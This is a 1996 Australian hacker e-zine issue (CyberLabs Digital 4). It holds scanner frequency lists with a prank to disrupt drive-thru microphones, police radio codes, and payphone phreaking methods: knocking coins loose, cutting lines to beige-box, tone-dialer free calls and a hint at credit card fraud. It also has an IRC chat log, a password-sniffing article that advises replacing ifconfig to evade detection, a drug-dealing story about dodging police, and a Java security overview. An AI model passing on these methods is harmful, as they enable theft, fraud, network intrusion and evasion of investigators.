04 - 27.005 14 - 27.125 24 - 27.235 34 - 27.345
05 - 27.015 15 - 27.135 25 - 27.245 35 - 27.355
06 - 27.025 16 - 27.155 26 - 27.265 36 - 27.365
07 - 27.035 17 - 27.165 27 - 27.275 37 - 27.375
08 - 27.055 18 - 27.175 28 - 27.285 38 - 27.385
09 - 27.065 19 - 27.185 29 - 27.295 39 - 27.395
10 - 27.075 20 - 27.205 30 - 27.305 40 - 27.405
< McDonalds - Drivethru staff >
These are pretty low powered things, so dont expect to get them from your
house (Unless, god forbid, you live next door to a McDonalds store).
So get about half a kilometer away at the most (200 meters might be better)
Also, some of the stores may use simplex systems (Transmit on one frequency
receive on another). Just see how things go.
30.840
31.000
33.140
35.020 -- Try this one first
40.430
151.715
151.775
151.895
154.060
154.570
154.600
154.700
165.600
169.445
467.775
457.550
McDonalds Wireless Mic Freqs.
170.245
170.305
171.105
171.905
Another great trick with these is to find the frequency of the mic you talk
into and turn your scanner right up on this frequency.
Put it close to your window, then go through the drivethru. When the lady/man
asks for your order, and you speak a nice lot of feedback is sent to them :)
Could be fun (Thanx to BlkGriff for that idea, although some others did
mention it as well)
< Kids Walkie Talkies >
Some of these operate on AM, generally somewhere close to the CB frequencies.
Some also operate on FM, close to 50 MHz (Some times it is written on the
back of the units).
Anything that creates RF energy can be received. So get out that old
Jet Hopper controller, scan for your computer, probably even your microwave..
-= MiSc INfo =-
< POLICE >
If you hear a short burst of 2000Hz tone it means:
1 tone : memo for all cars
2 tones: hold up alarm or serious crime
3 tones: Officer needs urgent help <Prick your ears up, could be interesting>
Also, the police use a code system to abbreviate things. eg. Car 301 code 1
The list of codes I have is about 3 years old, but here it is:
1 On Patrol 24 Suspect on premises
2 In Office 25 Suspect disturbed
3 At Station 26 Brawl
4 Away vehicle check 27 License offence
5 Away premises check 28 Omission Signal
6 At Court 29 Gaming Offence
7 Mobile to office 30 Drunk
8 Mobile to residents 31 Operational exercise
9 ? 32 Drowning
10 Domestic disturbance 33 Deceased
11 Armed suspect 34 Wilful Damage
12 Vehicle accident 35 Knifing
13 Ambulance 36 Larceny (Theft)
14 Assault and robbery 37 ?
15 Alarm - silent 38 ?
16 Ambulance required 39 Suspicious vehicle
17 Alarm - audible 40 Fingerprints
18 Assault 41 ?
19 Officer requires assistance 42 Escapee - Military
20 Burglary 43 Fire
21 Vessel in trouble 44 ?
22 Provide transport 45 Escapee - Mental
23 Peeping Tom 46 Drunk driver
47 Escapee - Civilian 60 Incident at ...
48 Explosion 69 Homicide
49 ? 70 Smash and grab
50 Breaking 71 Special duty
51 Indecent exposure 73 Robbery
52 ? 74 Rape
53 Hit & Run 78 Loitering
54 ? 79 Shooting
55 Indecent assault 80 Warrant at ..
56 ? 81 Wanted, detain
57 ? 86 Wanted: Felony
58 Indecent behaviour 87 Wounding
59 ? 88 Wanted: warrant for misd
97 Plane overdue
98 Plane crash impending
99 Plane crash..
200 Station car 400-449 Boat Squad
300 Divisional Van 470-499 Air wing
400 Crime car 500-539 Licensing
500 C.I.B 100---- Exercise/Inspector
600 Community Policing 560-569 Gaming
700 Special Duty/Solo 570-599 Vice
800 Foot Patrol 600-699 Women
900 Station radio
-= Other Info =-
If you have Internet access, then you can do searches for frequency lists.
Just use InfoSeek or something similar.
Here are some scanner links that might be of interest:
Links to scanner related pages - http://www.li.net/~j4dice/links.html
TBSA Frequency Guide - http://www.tbsa.com.au/locvic.html
Stoopid Scanner Tricks - http://exo.com/~rbarron/
Glen's Links - http://www.geocities.com/SiliconValley/5019/
Also check out the TBSA Frequency guide FTP site:
ftp.tbsa.com.au /pub/scan
I also have in my possession a program that can be used to decode pager tones.
It's called POCSAG Decoder (PD-201.zip) and can operate off scanners and the
like, once a small circuit has been built. So far I have be successful in
getting it to work with pagers made by Link Telecommunications. Telstra
pagers don't seem to work. I think they use a different system called GOLAY.
Anyway, if you would like a copy of this (or have some ideas etc) send me some
mail. I originally found it somewhere on the Internet, so search there as
well. Maybe a newer version will be out.
How to contact me...
Myst (vk3hax)
- darrin@lin.cbl.com.au (Will be down sometime September 1996)
- robinson@smbadm.ballarat.edu.au after September (include my alias at top)
Or on IRC (usually only OzNet) under the name Myst, Mystik or Magik.
._________________________________________________________________________.
-= ozPhreakin' - aCiD XTReMe - August '96
-= Revision 3.1
Catch me on #SeCuRiTY! in OZNET
This text is only to be used as an informative document. I do not encourage
these activities at all, nor will I accept any responsibility in any
circumstances where the below techniques are practised.
The phreaking scene is nearly dead in Oz, all the yankie hype of blueboxing
and redboxing is all bullshit. Telstra having an overly advanced fone system
isn't helpin' us either. But never say never, there is always some way to
break the fone Xchange. Just look at AT&T, some bigshots they are, scoopin'
in $$$ every day, and still they have faults in their system. Can't blame 'em
tho, nobodys perfect, no matter how stinkin' rich ya are.
-=-=-=-=-
Be vewwy careful.
Telstra is watching you. With their ESS system (electronic switching
system), Telstra is able to log every call you make. Even 1800 and operator
assisted numbers. I suggest, if you do try Phreakin' (I do not encourage this
activity) do it very carefully, by not using your own fone or friends/relatives.
Do not repeatedly call a single place in such a short time and do not leave
any names, addresses or numbers. All of this must be common sence for you,
this is just a friendly warning.
-=-=-=-=-
Freecalls.
COCOT's seem to be an easy target for phreakers these days, as they are
poorly made, and telstra don't really give a rats ass about them, after all,
they still are getting the money, even if people are phreakin' them. What is a
COCOT? I'm glad you asked. It stands for Customer Owned Coin Operated
Telephone. Telstra has released many models of these little beauties. The
crude, yet effective way of gettin' free calls off these babies is just
brutal force. Firstly pointed out to me by a friend of mine, he simply hit the
machine to get his 40c call. As it seems, the architecture of the fone
itself has a tiny flaw, which is that coins can simply be knocked out of the
box and into your hand. Knock it a few times and you get enough to buy
yourself a scratchy and hopefully win yourself enough cash to get a mobile
fone. Oh, just in case youre wondering, the fone I was talkin' about is the
goldfone released by telstra. The one with the 'folow on' button on it. This
way is quite brutal, and may attract attention. Also, the payfone is hired by
shops to make money. Abuse the privelages of free calls and you might find a
disgruntled shopkeeper with a $1000 fone bill take away the fone, leaving
you stranded. At the current version of this document this technique still
works.
A technique that I have known about for a while now (but have not yet
perfected) is the 'follow on' trick. Find yourself a gold fone and make
sure nobody else is lookin' at ya. Now, grab the reciever and listen in for the
dial tone. Hold down the follow up button and slam down the reciever, then
pick up the reciever while still holding down the button, and dial away.
Another technique that has been known to work goes back to the COCOTs. If
you look around, you could find yourself a COCOT which is not sold by telstra.
These are usually poorly made thingoes that are available to the public
from Dick Smith for a few hundred bucks and can be plugged into any fone
socket. You can usually find these at pubs and newsagencies. One trick you can
do is just trace the fone line to the socket in the wall, whip out your beige
box, and connect it to that. Most cases the line is hidden behind something,
so you could just cut the line and use that to beige box. A technique that
has only worked once for me is using a tone dialer on them. Dial up a 1800
number which will be free, and get the person on the other side to hangup. The
fone will reset itself and go back to the dial tone. The keypad is now still
disabled so you just whip out the tne dialer and dial away.
Get yourself a fone number to any payfone, dial it using a mobile or
whatever, then pick up the reciever of the fone you dialed. Hang up the other
end and then whip out your tone dialer. You may relise that the touch pad is
disabled, so then flick the hook once, and it should hang up the line. The fone
resets itself, so you use the tone dialer to dial the number you want. This
trick works great if you know the number to any box that is close to another
one. All you spend is 40c for the call, and you get yourself free STD/0055/IDD
calls. You can also get some numbers that dial your number back. Useful to
boxes that aren't close to others.
-=-=-=-=-
1800's
Free calls are a fun thing to do, even more fun when they're totally
legal. This is where the 1800 Xchange comes in. Once known as 008 numbers,
these are free to the caller from a home fone or a payfone. Scanning these
numbers may get you some juicy connections. A data line, fax line,
international line or even an adult service line.
Adult services.
You may think these numbers are perverted, or you may think they are the
best thing since sliced bread, but they have many other applications for a
fone phreak to use. Call one up and use a credit card number (I'm sure U know
what I'm hinting at here) now get someone you know to call it and do the same.
You now have yourself a conference line. Ask nicely if the fone sex chic could
just let you talk to your friends. She shouldn't mind as she is getting
paid for all that, but others who you dont know may be in the room at the same
time, so pay some respect to these women and do wat they say.
More next issue!
.____________________________________________________________________________.
.___________________.._____..__________________.
| #SECURiTY LaME & WIERD QU0TES |
| ASSEMBLED BY THE CLD CREW |
'______________________________________________'
<dude> does anyone know how to phreak in australia?
<dude> i have been trying but have had no luck
<DKiNG> duh!
* TWILIGHT is rolling on the floor, laughing at dude until he
just about pukes!
<DKiNG> next dumb question
<dude> anyone have any tips?
> anyone have any CC#'s ... h0h0h0h0h0
<nemesis> anyone got any warez sites :>
<aCiDX> yeah dude.. find one of those pits in the ground (not
the ones with a T on it.. thats not what youre looking for)
and go in, and play with the cables. the think ones are
phone lines
<aCiDX> once in there, you plug in your phone, and free calls
<dude> haha
<dude> no seriously
<aCiDX> i am
<aCiDX> its called pitting
<aCiDX> its a phreaking technique
<nemesis> he is
<aCiDX> the ones marked as telstra are actually power supplies.
the other ones actually contain the phone cables
<TWILIGHT> im gonna have to do some serious link chasing nem
the page will be found!
<DKiNG> another one.......walk upto some dude, belt him around
the head, take his mobile and use it till it ties :>
<aCiDX> shhh dking! dont tell him our techniques
> ties ... i have not tried that ;)
<DKiNG> acidx: sorry man just tryig to be helpful
<DKiNG> good site for info http://www.sentry.afp.gov.au/~phreak
<aCiDX> to get free calls on normal payfones, dial
0002663##**#<number you want to dial>5571<operator assistance
button>##*
<nemesis> dont tell him all our secrets acidx
<aCiDX> telstra wil never be able to block that technique nems
<DKiNG> *dude* thanks for the help
<aCiDX> unless they change every hardware in australia, that
technique will work
<dude> unreal!
<dude> thanks
<aCiDX> 0002663 will enable the linesman operating system
<aCiDX> have to type it in really fast or it wont work
<aCiDX> ##**# will get it to test a phone connection, so you
put in any number you want to call, and 5571 is the code, op
asst will initialise the connection, and ##*. well, dunno
what that does
<dude> how long do you have to hold in the op assitant button
<aCiDX> hold itfor about 5 secs
<aCiDX> maybe 6..
<dude> oh dking do you have another site that one doesn't work!
<aCiDX> its totally untraceable too. as ESS does not log it as
a call
<aCiDX> call anyone, theres absolutely no way (unless someone
is testing the line at he time) to find out who you call and
where
<aCiDX> works for all numbers too
<dude> even overseas? and international?
<DKiNG> ummmmmm maybe its without the www...yeah i think the
afp just use http://sentry.afp.gov.au/~phreak
<nemesis> hell yes, even on the moon
<DKiNG> *ROFL*
<dude> no doesn't work either
<nemesis> oh dking, that site doesnt work either ;>
[ed note: as u can see, dudes IQ spands that of a retarted KUA member. LOL.
Very few of the techniques described here would even work, &
http://sentry.afp.gov.au/~phreak. wot kinda fool would be dat lame? h0h0h0]
<The-Mind> that'll attract the feds like moths to a flame
is there any books on hacking?
the does superuser mean?
what program do you use to hack pc's
how do you get the number of the other pc
so warez is copied files?
can i have ops?
<Anaconda> if ya dont know what to do in a unix sys mind DONT TRY TO HACK IT
<frog> .me is from oz..
<frog> DOH!
<Anaconda> feds are pussy's
*** ssnake changes topic to "Absolutely >NO< illegal activity going on in
here, so piss off!"
* Reaper killed millions of aliens in ufo's by farting on an ant hill!..
<PiNZ> ne1 here know about ozemail tightening up the security?
<St> fedz are on Ozemail
i really wanna learn something
does anyone know how to phreak in australia? i have been trying but
have had no luck
what is the root account?
what does @ next to your alias mean?
so who are telstra again?
*** BlackHaze changes topic to "Morphin back at ya wiff 0-day kardin' k0d3z#!@
wh00t#@!"
<nemesis> DeM k0DEz /\Re k0MinG T|-|Ru
<The-Mind> PGPfone? Don't think zimmerman programmed that one did he?
Hello fellow hackers!
i'm not lame you are!
what is lag?
what is +tn on the top of the window mean?
<|-XYZ-|> who has something to trade 4 a T1 hacking site??
<frog> shaman: #hacking is soon to be shut down by ircops....
<ssnake> The meaning of "hacker" has been twisted by the media
<ssnake> Is it true that the US government forced the D00d who write PGP to
write a backdoor into the latest international versions?
[Ed: We at CLD can verify the existment of the pgp backdoor ;> ]
<Shard> pinz: he must have hacked root on machine to create account or are
they non unix machines... thats a major feat in itself
<{_DeV_}> yeah, hacking away the bricks....
<Sage> i am the hacker of hackers
<BlackHaze> Sage: oh, da haqrz of all haqrz... hhehe. spew forth your
knowledge
<Sage> graduated from SAS swat team 2 yrs ago
[Ed: Sage said to me that for graduating from SAS, me managed to steal 7,
thats right, seven waterpistols!!]
.____________________________________________________________________________.
-= The Basics of Sniffing
-= By MiNDWaRP
Intro
~~~~~
Well this is my first article for CLD, so I will try to make it as good
as possible. For those ppl who don't know me my name's MiNDWaRP and you
can occasionally find me on #security on IRC. Other than that you can mail
me through KaosNet or DaemonNet. This issues article is to do with sniffing.
How to gain heaps of information not meant for you by spying on ethernet
packets. Uses could include spying on email thru to gaining credit card
numbers/account numbers. However you must have root axs on a networked
computer before you can do this. This article will not detail how to get root,
but it will tell you the basics of what sniffing is, programs you need to do
it, some common sense advice when it comes to sniffing, and some source code
you can compile...
Greetz
~~~~~~
Greetz go to Grim, TPV, Void, AciDX, and everyone else in the scene.
Fuq offs
~~~~~~~~~
Fuq offs go to the eternally pathetic Pierre Thorand, and all the try-hard
lamer anarchists who do nothing but talk.. if your so good why don't you
prove it...
The basics of sniffing
~~~~~~~~~~~~~~~~~~~~~~
Computer networks today, unlike telephone sytems, rely upon computers sharing
information rather than individual connections to a central mainframe. This
means that a computer connected to a network is capable of recieving
information that was meant for another computer. Capturing the information as
is passes through the network is known as sniffing.
Nowadays the most "popular" way of connecting pc's is through the ethernet. For
those who don't understand how the ethernet works i will briefly describe it
for you. The ethernet protocol works by sending small "packets" of info to all
machines/pc's on the same network. Contained within the packet is what is known
as a packet header. This header contains the address of the destination
machine. Supposedly (yeah right.. ;) only the machine with the matching address
is meant to recieve the packet. A machine that accepts all packets is said to
be in promiscuous mode..
In a normal networking environment, account and password information is
passed along in clear-text, making it relatively easy for someone, once they
have gained root axs on a machine, to put it into promiscuous mode, and by
sniffing, "compromise" all the machines in the network.
HOw do i do it..?
~~~~~~~~~~~~~~~~~
Well, the primary way us hackers compromise these ethernet packets by
sniffing is through the use of groovy little progs. One such program is
called esniff.c which is for use on Unix systems. However there is a variety
of sniffers available, both freeware and commercial for most O/S.
Network Sniffers
~~~~~~~~~~~~~~~~
* Snoop on Solaris 2.x, also works on SunOS 4.1 - ftp.playground.sun.com
* Packetman - ftp.cs.curtin.edu.au:/pub/netman/[sun4c|dec-mips
|sgi|alpha|solaris2]/packetman-1.1.tar.Z <-(haven't checked this out)
* Esniff.c - ftp.coombs.anu.edu.au:/pub/net/log
Dos based sniffers
~~~~~~~~~~~~~~~~~~
* Ethdump v1.03 - ftp.germany.eu.net:/pub/networking/inet/ethernet
/ethdp103.zip
* Ethload v1.04 - companion util for use with an ethernet monitor
- ftp.germany.eu.net:/pub/networking/monitoring/ethload/ethld104.zip
These are not the only sniffers available, there are commercial ones
available, but who is going to PAY for one of these...? There are also many
sniffers comming out recently which are available at most good hacking
web sites.
Advice when using a sniffer
~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. A method used by sysadmins to detect a sniffer that only collects data,
and does not actually respond to any of the information, is to "physically"
check all ethernet connections in a network. So if you are running a sniffer
from a computer you have regular axs to, i.e. at work or school, but you have
physically connected it to a network that it's not meant to be connected to
it makes sense to disconnect it after you are finished. In other words
minimise the time it is connected to minimise the risk of getting caught.
2. There is a command on some Unix systems which allows a sysadmin to check
the status of all interfaces and whether or not they are in promiscuous mode.
>ifconfig -a You should run this to see whether the sniffer you are using
is detectable. By replacing the command "ifconfig" you will greatly reduce
the chances of detection.
3. When you run a sniffer make sure you regularly check the log it creates,
copy it if necessary, and delete it aftewards. This is due to the fact that
if you run a sniffer on a heavily-utilised network the log becomes so large
that all the file space is used up. Now obviously it would take a while to
happen, but if you carelessly leave one running it is possible.
.____________________________________________________________________________.
DIsClAiMeR:The following story is ficticious and bears no resemblance to
things that may or may not have happened to persons living ,dead or undead :>
Getting Trashed By The Cops
~~~~~~~~~~~~~~~~~~~~~~~~~~~
I lived in a house with two other guys a drummer and loser we'll call them
Chuck and Steve.We lived on a busy main road ,an had lots of friends
droppin by ,to say hello an score.I probably moved an ounce or so a week in
$50 bags to people we knew from school and other acquaintances,which was
fine by me ,a few $$$ on the side an free smoko whenever I wanted it.Not so
for Steve , he couldn't keep his side of things together,he'd constantly
smoke more than he sold an eventually put himself out of business,ie no one
would give him credit,so he couldn't deal.SO I inherit Steves 'dealerhip'
which was pretty big,full of peolpe I didn't really know that well,but they
had the cash an knew not to ask for credit.I started to move a LOT more dope
, Steve was unemployed an at home all day and was able to handle the
distribution during the day ,he'd was under strict orders of no credit to
anyone an d would 'skim' off the top of the bags to keep himself in dope.
Things were going along quite nicely ,I had a nice little earner on the side
,Steve was getting as bent as he wanted.Then things started to get a little
odd,our garbage bin would move from where I left it,the side gate was
sometimes open or ajar,I figured it was one of the guys being lazy or
somethin ,I shrugged it off as my legit business was booming and I didnt
have the time or the motivation to look into it.
Things got worse, people I didn't know started knockin on the door an askin
to score ,If Steve wasn't there to vouch for them I'd tell them to FUCK
OFF,things were gettin a bit outta hand,upon quizzing Steve most of the
people he could ID but some he didn't know ,he passed them off as friends of
friends.This was not good, I was aware of what we were doing could get us
into a lot of trouble ,Steve however didn't really give a fuck or understand
what his actions could lead to.The dealing continued with me telling Steve
to scale things down to a managable level.I might add that Chuck was cool an
kept his part of the dealings in control.Steve didn't scale things down, the
phone was ringin off the hook an people were comin an goin like crazy on
weeknights (usually a quiet time)It was round then I quizzed the guys about
the garbage bin an the side gate.They said they never used the gate and I
was the one who had the garbage dutys.....
It took a while for the penny to drop,so life went on, people who called in
after 11pm on weeknights were greeted at the door by me an a pump action
shotgun ,that problem soon stopped.Things were back to 'normal' a lotta
comings an goings mostly Thur,Fri,Sat which was cool an the bin seemed to
stop moving and the gate remained closed.
It was a Tuesday night/Wednesday morning about 2.30am ,the doorbell rang an
rang an rang till I woke up grabbed my rifle an answered the door(i was not
in a good mood).There was a woman dressed in a local pub staff shirt asking
if she could score? saying she'd heard she could score from here,I'd never
seen here before and out on the street a late model Comodore was waiting
for her ,I told her to FUCK OFF!She took the advise and left.
The penny finally dropped ,the barmaid was an undercover COP,and the moving
bin thing was the COPS TRASHIN US FOR EVIDENCE.FUCK!
Next morning we had a meeting ,I declared the shop was SHUT.I didn't need
the shit that happened last nite and stopped giving Steve product to sell an
told him to spread the words to his 'friends'.New precautions were placed on
the garbage,every night I'd pour sour milk or mouldy potato juice or
anything else disgusting I could find over our garbage.
About a week later I found 1/2 the contents of our garbage bin laying in
our backyard.The bin was previously left out the front,I sorta felt sorry
for the cop who went thru it ,as it was a particularly disgusting pile of
rubbish, my guess was they got halfway thru and got sick ,suckers.
Oh well time to move,that day I terminated the lease and within a fortnight
was in a different house with different people .
Some lessons learned, never throw out incriminating evidence with your
hosehold waste(yeah even 'roasted' cigarette butts) it seems the cops have
been trashin long b4 hackers existed.Sell only to who u know ,if I sold to
the'barmaid' who knows what would've happened.It won't be your own stupidity
that gets u busted ,it'll be someone else who fucks things up for you.Steve
was STUPID he has since gone down for several posession and trafficking
charges,once the cops know who u are they keep a close eye on you.If in
doubt move out,its cheaper than a court case.
-JET BLACK
Catch me on #security on Oznet
.___________________________________________________________________________
-= Java Security - Does Suns new language promise security on the Internet
-= By CLD Staff
-= Revision 1.2
Java. Yes, no doubt of the biggest media hype up concerning computer languages
of all time. Many people believe that Java is just pretty multimedia purposes
for on web pages. Infact this is defiantly not the case, more than half the
digital community do not see the full potential of this exciting new language.
To put simply Java is not another form of multimedia scripting/auothring rather
programming for the Internet. It extends far beyond buttons, sounds, animations
on the web, take the case that you had an Oracle database on a mainframe which
did not support http capabilities you could write a Java applet to directly
communicate with the server & pump out the data from the mainframe directly
on the web with little hassle. Let's hope that people grasp this exciting
new language as it looks as though Java will radically change the Internet
as we know it today.
With Java extending such large capabilities security issues becomes a concern.
As a general rule of thumb, any data accessed over a network other than
local is presumed 'untrusted' & the Java environment takes precautions
that an applet cannot do malicious actions. Such as corrupting your
system, opening network connections to untrusted sources, deleting files etc)
Sun has realised this and in turn have focused much attention in addressing
security related problems in the Java environment. But as always bugs are
promenant in the security model & measures have to be taken to assure that
malicious code won't be able to run
Java Security Restrictions
The Java Security model has some heavy restrictions on what a Java
applet can and cannot do. Intermediate security options are available to
allow an applet to run in an un-restricted environment and as Java gains
it's foothole on the Internet Web clients will allow user control over
these restrictions for applet's to open network connections to other
hosts and more flexibility over the i/o disk functions on the local
system etc.
Generally speaking an applet loaded over a network other than local cannot
have these current restrictions
- Read/Write files on the local system
- Open a network connection to other hosts, other than where the applet
originated from
- Check for the existence of a file on the local system
- Listen for incoming network connections on any port on the local
system
- Call System.exit() or Runtime.exit() to force the Java client to exit
- To create a SecurityManager/ClassLoader Object
- Obtain user information, or obtain information about the following
system properties
user.home
java.home
user.name
user.dir
java.class.path
- Access or load any other class, other than the standard eight
java.awt
java.lang
java.net
java.io
java.applet
java.awt.peer
java.util
java.awt.image
- The malipulation of any other ThreadGroup other than its own
- Call file.delete() to delete files on the local system or invoke rm or del
- Call file.rename() to rename files on the local system or invoke mv or
rename
- Call File.mkdir() to create directors
The Java application which runs the applet decides many of the above
restriction if they are valid or not. If an applet is loaded
from the local network many if not all of the above restrictions
are lifted & the applet can usually run in a more or less un-restricted
environment.
The java.lang.SecurityManager controls which security operations are
allowed under the current environment. Applet clients create a sub-class
of the SecurityManager to implement what security policy it will
use. A security policy is in place by calling System.setSecurityManager()
an obvious security hole is in place, if untrusted code is loaded over
the network & it implements it's own SecurityManager object the applet
could run itself in it's own environment without any restrictions. Of
course Sun has realised this huge problem & measures are in place for
untrusted code not to load its own SecurityManager object.
With the added security of the java.lang.ClassLoader, this class prevents
an applet to replace the standard eight Java classes with their very own.
Not only does the Java environment include tough measures in how classes
are loaded over the network & what security measures are in place for the
applet to run in a environment defined by the SecurityManager it also
provides Byte-Code Verification where code is passed to insure that code
cannot forge pointers to memory more cause strange things to happen in the
running of the applet.
Overall, Java's security is well structured but some important bugs
need to be addressed before Sun can claim that Java's security is
un-breakable.
.____________________________________________________________________________.
-= neXt iSSUE
Well, we hope that this issue is up to standards as we have totally
re-organized the way CLD works & the writers/editors involved.. Until next
issue try desperatly to unite the scene & finally lift it off the ground as
we feel that time has finally come..
neXt iSSUE...
TCP/IP & it's structure
The CLD crew will investigate bugs behind linux & write some ka0s k00l code.
More Aussie Phreaking Techniques
More News, Java fakemail applets...
& Much more.
.____________________________________________________________________________.
CYBERLABS DiGiTAL iSSUE 4
bhaze@fl.net.au
diceman@fl.net.au
sydney.oz.org - #security
EOF